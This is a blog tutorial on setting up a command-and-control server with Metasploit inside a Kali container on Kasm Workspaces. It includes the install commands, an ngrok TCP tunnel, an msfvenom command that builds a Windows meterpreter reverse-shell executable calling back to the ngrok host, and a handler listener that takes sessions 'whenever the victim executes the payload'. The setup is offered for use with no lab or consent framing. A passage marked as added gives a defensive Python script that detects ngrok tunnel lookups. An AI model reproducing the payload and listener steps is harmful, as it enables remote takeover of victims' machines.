
Setting up a C&C Server with Metasploit and Kasm Workspaces

In this article, I will walk you through setting up your Command and Control Server using Metasploit and Kasm Workspaces.


Metasploit is a penetration testing framework that contains a payload generator and many modules to enumerate and exploit known vulnerabilities on different targets. It can also be used as a Command and Control (C&C) server to manage target sessions, maintain persistence, perform post-exploitation, etc. It is a must-have tool in any hacker's toolkit.


Kasm is a Docker container streaming platform which enables you to run private sessions of Docker apps and use them directly from your web browser. It supports many awesome features like session casting, the ability to destroy/pause/resume sessions, and so on. With the help of Kasm, you can keep your Docker apps organized in one place and ready to use.


We will first set up a Kali Linux hacking lab in Kasm Workspaces and then use the pre-installed Metasploit framework from the Kali Linux container.


Install Kasm

Kasm can be installed on any Linux machine with at least 2 CPU cores, 4 GB memory and 50 GB SSD storage. I like to install Kasm on a cloud instance because I want my C&C server to be always available and online. However, you can install Kasm on your local Linux machine as well. The official installation guide for Kasm is here: https://kasmweb.com/docs/latest/index.html


Just run these five simple commands to install Kasm:

# Go to /tmp
cd /tmp

# Download Kasm
curl -O https://kasm-static-content.s3.amazonaws.com/kasm_release_1.14.0.3a7abb.tar.gz

# Extract
tar -xf kasm_release_1.14.0.3a7abb.tar.gz

# Install Kasm
sudo bash kasm_release/install.sh

Great! Now that you have Kasm installed, you can log in to your dashboard by going to https://<YOUR_IP>

You can log in with the default credentials that were displayed on the terminal when Kasm finished installing.


Install Kali Linux

Kali Linux is a Linux distribution designed for digital forensics and penetration testing. It comes with Metasploit pre-installed.

From your dashboard, go to Workspaces -> Add from Registry and install Kali Linux from the list of available Docker images.


Once Kali is installed, go back to Workspaces and open a new session.


That's it! You now have a Kali Linux session.


Set up tunneling

Since you are running Kali Linux as a Docker container, you will not be able to receive inbound connections from the Internet. However, it is very important for your C&C server to be available on the Internet to receive connections from the targets. To fix this, you can use ngrok to create a secure tunnel from the Internet to your local network interface.

  • Go to ngrok.com, create an account and download ngrok

  • On the download page, you will also find the command to activate your ngrok tool with your unique auth token. Simply copy and paste it into your terminal to authenticate.

Now, use the following command to set up a tunnel:

./ngrok tcp 1560

This will create a tunnel from the ngrok servers (which are accessible from the Internet) to your localhost on port 1560. Feel free to use whatever port you like.

This will generate an ngrok address (6.tcp.ngrok.io in my case) and a unique port (17800 in my case).


You can use this address and port whenever you are creating a payload. For example, let me create a payload with msfvenom for a Windows target with the command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=6.tcp.ngrok.io LPORT=17800 -f exe > payload.exe

Notice how I used my ngrok address for the LHOST and my unique ngrok port for the LPORT. When a connection is received on this address and port, ngrok forwards it to my localhost on port 1560.
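
Seen from the defender's side, the flow above means a host that runs such a payload first has to resolve an ngrok TCP endpoint name. The following Python example is added here and is not from the original article: it scans dnsmasq-style DNS query logs for those lookups. The log lines are constructed, and the optional two-letter region label in the pattern is an assumption.

```python
import re
from collections import defaultdict

# Constructed dnsmasq-style query log lines (sample data, not from the article).
SAMPLE_LOG = """\
Jan 10 09:14:02 dnsmasq[811]: query[A] updates.example.com from 10.0.0.21
Jan 10 09:14:07 dnsmasq[811]: query[A] 6.tcp.ngrok.io from 10.0.0.37
Jan 10 09:14:09 dnsmasq[811]: query[AAAA] 6.TCP.ngrok.io. from 10.0.0.37
Jan 10 09:15:30 dnsmasq[811]: query[A] 2.tcp.eu.ngrok.io from 10.0.0.44
Jan 10 09:16:00 dnsmasq[811]: query[A] 6.tcp.ngrok.io.example.net from 10.0.0.21
Jan 10 09:16:12 dnsmasq[811]: query[A] ngrok.com from 10.0.0.50
"""

# Pulls the query type, queried name and client address out of one log line.
QUERY_RE = re.compile(
    r"query\[(?P<qtype>[A-Z]+)\]\s+(?P<name>\S+)\s+from\s+(?P<client>\S+)"
)

# <digits>.tcp.ngrok.io is the form shown in the article; the optional
# two-letter region label (e.g. "eu") is an assumption.
TUNNEL_RE = re.compile(r"\d+\.tcp\.(?:[a-z]{2}\.)?ngrok\.io")


def normalize(name):
    """Lower-case the name and drop a trailing root dot."""
    return name.rstrip(".").lower()


def is_ngrok_tcp_endpoint(name):
    """True only if the whole name is an ngrok TCP tunnel endpoint.

    fullmatch() keeps look-alikes such as 6.tcp.ngrok.io.example.net out.
    """
    return TUNNEL_RE.fullmatch(normalize(name)) is not None


def find_tunnel_lookups(log_text):
    """Return {client_ip: {endpoint: lookup_count}} for tunnel lookups."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m and is_ngrok_tcp_endpoint(m.group("name")):
            hits[m.group("client")][normalize(m.group("name"))] += 1
    return {client: dict(hosts) for client, hosts in hits.items()}


if __name__ == "__main__":
    for client, hosts in sorted(find_tunnel_lookups(SAMPLE_LOG).items()):
        for host, count in sorted(hosts.items()):
            print(f"{client} looked up {host} ({count}x)")
```

A hit is a lead rather than a verdict, since developers also use ngrok legitimately; correlate it with the outbound TCP connection from the same client that follows the lookup.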


Now, to set up the listener, I will open my Metasploit console with the msfconsole command and use exploit/multi/handler, then set the payload to the same one used above (windows/x64/meterpreter/reverse_tcp).


I will then set the LHOST to localhost and LPORT to 1560 because this is where the connections from the Internet will be forwarded to by ngrok.


That's it! I will now simply type run and my listener is online. Now, whenever the victim executes the payload, I get a reverse shell on my msfconsole!

And just like that, we are able to set up a C&C server on the cloud with the help of Kasm Workspaces and Metasploit!


© 2019 Tech Raj. Designed by Teja Swaroop
